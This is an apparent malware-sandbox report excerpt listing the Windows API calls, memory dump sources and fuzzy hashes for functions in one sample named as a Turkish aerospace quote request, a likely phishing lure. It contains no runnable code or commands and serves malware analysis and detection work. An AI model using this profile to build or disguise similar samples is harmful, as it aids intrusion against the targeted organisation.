• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
• Opcode ID: f39ec7e51e5246a5b8318364301aed45cb95f5df63cb5976614b88cfc8cc9944
• Instruction ID: c442da78625c6d4accc8f6c6c90cc6ab232f82f6806dd5725177ff3c9cf9757c
• Opcode Fuzzy Hash: f39ec7e51e5246a5b8318364301aed45cb95f5df63cb5976614b88cfc8cc9944
• Instruction Fuzzy Hash: 3C219171A10272AFDB709E3CDC04A6A3BA4FB06761F604768FAB6D71E0D73598118B90
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FF9320
  • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FF9352
• __itow.LIBCMT ref: 00FF936A
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FF9392
• __itow.LIBCMT ref: 00FF93A3
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: MessageSend$__itow$_memmove
• String ID:
• API String ID: 2983881199-0
• Opcode ID: aa413d98ee3e6cb165f5e9f1664c1ec331399a946d00e9723cf54c3b72532c57
• Instruction ID: 83dc79de8007909d5e921ad974e8adde93957ea3d9e258e509ed9693f2b59d68
• Opcode Fuzzy Hash: aa413d98ee3e6cb165f5e9f1664c1ec331399a946d00e9723cf54c3b72532c57
• Instruction Fuzzy Hash: 9E212831B0420C6BDB20AE609C89FFE3BADEF49760F044029FA44DB191D6B58D44A791
APIs
• IsWindow.USER32(00000000), ref: 01015A6E
• GetForegroundWindow.USER32 ref: 01015A85
• GetDC.USER32(00000000), ref: 01015AC1
• GetPixel.GDI32(00000000,?,00000003), ref: 01015ACD
• ReleaseDC.USER32(00000000,00000003), ref: 01015B08
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: a6a31692f0545441debc753509825d2bce1d8ac338d04ec5890616f195840e4b
• Instruction ID: 07a2bd0286adcd8dc83758cfbc6c8fde50c4326746d8a50ca2b34c1ff94081aa
• Opcode Fuzzy Hash: a6a31692f0545441debc753509825d2bce1d8ac338d04ec5890616f195840e4b
• Instruction Fuzzy Hash: 9321A176A00204AFD720EF64DC88A9ABBF5FF89350F148079E889D7355CA78ED00DB90
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FA134D
• SelectObject.GDI32(?,00000000), ref: 00FA135C
• BeginPath.GDI32(?), ref: 00FA1373
• SelectObject.GDI32(?,00000000), ref: 00FA139C
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: c55dc24594bcdebea1c101dfe3618bdd75098fdd398e0ccdef4d4756cbcd8100
• Instruction ID: 0e7f769080a3d4f7e4b2e1e5cac70e15d09b10ec3db4eb99a3307eb6288fc7e1
• Opcode Fuzzy Hash: c55dc24594bcdebea1c101dfe3618bdd75098fdd398e0ccdef4d4756cbcd8100
• Instruction Fuzzy Hash: 81215E71800309EFDF218F25DC4476D7BA8FB053A1F258216F890A69A4D77A9891EF90
APIs
• GetCurrentThreadId.KERNEL32 ref: 01004ABA
• __beginthreadex.LIBCMT ref: 01004AD8
• MessageBoxW.USER32(?,?,?,?), ref: 01004AED
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 01004B03
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 01004B0A
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
• String ID:
• API String ID: 3824534824-0
• Opcode ID: 572ea931e96b13ff1b542c0023ad842c47f66c99887c7469ac9f8bd87a3cbdad
• Instruction ID: b7668618b6fa14e41339889a80eeb907bdd88daa4a202dcdf582359f2b691961
• Opcode Fuzzy Hash: 572ea931e96b13ff1b542c0023ad842c47f66c99887c7469ac9f8bd87a3cbdad
• Instruction Fuzzy Hash: FC112B76904206BBE7319FBCDC08B9F7FBCEB46364F244259F954D3294D67A890487A0
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FF821E
• GetLastError.KERNEL32(?,00FF7CE2,?,?,?), ref: 00FF8228
• GetProcessHeap.KERNEL32(00000008,?,?,00FF7CE2,?,?,?), ref: 00FF8237
• HeapAlloc.KERNEL32(00000000,?,00FF7CE2,?,?,?), ref: 00FF823E
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FF8255
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
• Opcode ID: e0ff212b101dab06361551dd1a8caf60abba0febbca0fb65b070a305d963caea
• Instruction ID: 0c7b7cbaf7b0c46a37c0d7f8af8d275fa671ac9e9e7effa61fbfa81087841eb5
• Opcode Fuzzy Hash: e0ff212b101dab06361551dd1a8caf60abba0febbca0fb65b070a305d963caea
• Instruction Fuzzy Hash: 7D016D71600209BFDB305FA5DC48D6B7BBCEF8A7A4B600429F949C2220DB329C01DB60
                                                                                                                                    APIs
                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?,?,00FF7455), ref: 00FF7127
                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF7142
                                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF7150
                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?), ref: 00FF7160
                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF716C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3897988419-0
                                                                                                                                    • Opcode ID: c152f9d9bb3abb7b65b7953f1257af23b96cdc9566ed1d7253882df0e2a788f6
                                                                                                                                    • Instruction ID: e89ead9ae55496c3e5bd64be6e58260289b4b2ba79be9a0792a471673eb4ef7e
                                                                                                                                    • Opcode Fuzzy Hash: c152f9d9bb3abb7b65b7953f1257af23b96cdc9566ed1d7253882df0e2a788f6
                                                                                                                                    • Instruction Fuzzy Hash: 3D01D472A00319BBCB205F24DC44BAAFBBCEF44BA1F2000A4FE44D2224D776DD01A7A0
                                                                                                                                    APIs
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01005260
                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0100526E
                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 01005276
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01005280
                                                                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                    • Opcode ID: 0c895175183057d5471fb89a036ba47501ee12973da726028d1a33f6e83756d5
                                                                                                                                    • Instruction ID: d5a2af1e7cb9c9f741365accf5e54bf344affb8812d84a189f9999e58624aa3f
                                                                                                                                    • Opcode Fuzzy Hash: 0c895175183057d5471fb89a036ba47501ee12973da726028d1a33f6e83756d5
                                                                                                                                    • Instruction Fuzzy Hash: AF015735D0161EDBEF21EFE4EC48AEDBB78FF0A711F500086E981B2284CB3955508BA1
                                                                                                                                    APIs
                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FF8121
                                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FF812B
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF813A
                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF8141
                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF8157
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                    • Opcode ID: 731649a91f643c8c9d775f84d2a334672d337edc0525dad981c3e501f4f3751c
                                                                                                                                    • Instruction ID: dce1406d85799f23b518ea20350535b7105abd32591a2bf042c44db63bf9f6fe
                                                                                                                                    • Opcode Fuzzy Hash: 731649a91f643c8c9d775f84d2a334672d337edc0525dad981c3e501f4f3751c
                                                                                                                                    • Instruction Fuzzy Hash: E7F04471600305AFE7311E65DC88E773BBCEF457A4B200115F685C6150CB659952DB60
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00FFC1F7
                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00FFC20E
                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00FFC226
                                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 00FFC242
                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00FFC25C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                    • Opcode ID: 55771d784ae4b1523da8c566ab5c79c260fb364aef1b54b286cc79a92ddf6e15
                                                                                                                                    • Instruction ID: e717cee9fd89924df6c73072dde9885b20ca4235f1118462634a7e80fa27b2be
                                                                                                                                    • Opcode Fuzzy Hash: 55771d784ae4b1523da8c566ab5c79c260fb364aef1b54b286cc79a92ddf6e15
                                                                                                                                    • Instruction Fuzzy Hash: 5901A73040431D97EB305F60DD4EFA67778FF04B05F00025DE682A14E1DBE96948AB90
                                                                                                                                    APIs
                                                                                                                                    • EndPath.GDI32(?), ref: 00FA13BF
                                                                                                                                    • StrokeAndFillPath.GDI32(?,?,00FDB888,00000000,?), ref: 00FA13DB
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00FA13EE
                                                                                                                                    • DeleteObject.GDI32 ref: 00FA1401
                                                                                                                                    • StrokePath.GDI32(?), ref: 00FA141C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2625713937-0
                                                                                                                                    • Opcode ID: cdb3beba66225d3f7bc5106a2e293b3c40a96a025f193ebf62e33404110df5e1
                                                                                                                                    • Instruction ID: 57dc7cafb09e4d6a42daa2a0501f422c729ecf6cd4163000a60492c2e7bbee43
                                                                                                                                    • Opcode Fuzzy Hash: cdb3beba66225d3f7bc5106a2e293b3c40a96a025f193ebf62e33404110df5e1
                                                                                                                                    • Instruction Fuzzy Hash: A4F01D300003099FDB315F1AEC4C7583BB5BB023A6F188215F8A9584F8C73E4595DF10
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FC0DB6: std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                                                                                      • Part of subcall function 00FC0DB6: __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                      • Part of subcall function 00FA7A51: _memmove.LIBCMT ref: 00FA7AAB
                                                                                                                                    • __swprintf.LIBCMT ref: 00FB2ECD
                                                                                                                                    Strings
                                                                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FB2D66
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                    • API String ID: 1943609520-557222456
                                                                                                                                    • Opcode ID: 4a49a595e7acc4a5369f3691a9fa763740e1eb48a5675bd5ca89656c31d2907c
                                                                                                                                    • Instruction ID: cbcbbb46fdfa2388337bbf243c470aa018e705b290d34bb57fe6bce9651005a1
                                                                                                                                    • Opcode Fuzzy Hash: 4a49a595e7acc4a5369f3691a9fa763740e1eb48a5675bd5ca89656c31d2907c
                                                                                                                                    • Instruction Fuzzy Hash: C8918C715083059FC714EF25CC86DAFB7A8EF9A760F00491DF4869B2A1DA38ED44EB52
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0100B9BB
                                                                                                                                    • CoCreateInstance.OLE32(01032D6C,00000000,00000001,01032BDC,?), ref: 0100B9D4
                                                                                                                                    • CoUninitialize.OLE32 ref: 0100B9F1
                                                                                                                                      • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                                                                                      • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                    • String ID: .lnk
                                                                                                                                    • API String ID: 2126378814-24824748
                                                                                                                                    • Opcode ID: 5d1dfefac1699368011a1beca95cabcfda3761c981eb9892defc8e9326414ef1
                                                                                                                                    • Instruction ID: f85eab9002cd2c7423c150ba8667785a6997044e334df7b2eb0244005ccd01b5
                                                                                                                                    • Opcode Fuzzy Hash: 5d1dfefac1699368011a1beca95cabcfda3761c981eb9892defc8e9326414ef1
                                                                                                                                    • Instruction Fuzzy Hash: 1EA166746043059FD711DF14C884D2ABBE5FF8A314F048998F8999B3A2CB75ED45CB92
                                                                                                                                    APIs
                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00FC50AD
                                                                                                                                      • Part of subcall function 00FD00F0: __87except.LIBCMT ref: 00FD012B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorHandling__87except__start
                                                                                                                                    • String ID: pow
                                                                                                                                    • API String ID: 2905807303-2276729525
                                                                                                                                    • Opcode ID: 724fbf9af89edb304665ce0fc1747526685de383f4f78eacfc0484c9f3824baa
                                                                                                                                    • Instruction ID: 06b54c12e3c92cb5aa103d95bed9c4bde233c6e5073a48045ed5f005a08421a6
                                                                                                                                    • Opcode Fuzzy Hash: 724fbf9af89edb304665ce0fc1747526685de383f4f78eacfc0484c9f3824baa
                                                                                                                                    • Instruction Fuzzy Hash: A8518B71D0960386DB217624CE07B6E3B95AB40B20F28895EE4D5C6399DF399DC4BB82
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset$_memmove
                                                                                                                                    • String ID: ERCP
                                                                                                                                    • API String ID: 2532777613-1384759551
                                                                                                                                    • Opcode ID: f6f4411607d113955e74c7c22b1e00fd4dcf52b3caeaa110d76729e821f0cf4d
                                                                                                                                    • Instruction ID: ef44bbb142230225388ddc156ec0046b40d864620693f5be7a3a8a48280d1dc2
                                                                                                                                    • Opcode Fuzzy Hash: f6f4411607d113955e74c7c22b1e00fd4dcf52b3caeaa110d76729e821f0cf4d
                                                                                                                                    • Instruction Fuzzy Hash: E8518171900309DBDB24DF55C941BEAB7E4EF44314F24456EE94AC7251EB38AA44EF50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 010014BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FF9296,?,?,00000034,00000800,?,00000034), ref: 010014E6
